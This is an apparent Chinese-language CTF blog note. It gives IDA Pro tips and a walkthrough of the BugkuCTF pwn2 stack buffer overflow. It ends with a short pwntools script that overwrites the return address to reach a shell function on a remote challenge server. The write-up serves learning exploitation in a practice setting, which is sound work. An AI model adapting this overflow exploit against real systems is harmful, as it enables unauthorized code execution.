PwnNotes-0x00 开始

Posted 2021-07-08 Hellsegamosken

写在前面

一些 IDA Pro 的使用：
Shift + F12：打开 String window，在其中搜索某个字符串即可定位到内存中的位置。右键，jump to xref to operand… 即可定位到引用了该字符串的函数。

BugkuCTF-pwn2

读入了一个字符串长度最长 0x100，但是从第三行得知 s 到 rbp 只有 0x30，因此可以覆盖 main 返回地址。

在左边找到一个函数名叫 get_shell_，显然可以跳转到这里。

这里，只需要跳转到 0x400751。

那么输入的字符串应该是什么？注意到从 rbp-30 处填写 30 个字节覆盖到 rbp 之前，再填写 8 个字节覆盖 rbp，再填写的东西就覆盖返回地址了。如图：

因此，先瞎填 38 个字节，然后填 p64(0x400751) 即可。
注意，python2 下，该函数转化为 8 个字符，p64(0x1144) = ‘D\\x11\\00\\00\\00\\00\\00\\00’。这样小端对齐，在内存中看来就是一个正常的地址。

from pwn import *

sh = remote("114.67.246.176", 14235)

print(sh.recv())
payload = "k" * 0x38 + p64(0x400751)

sh.sendline(payload)
sh.interactive()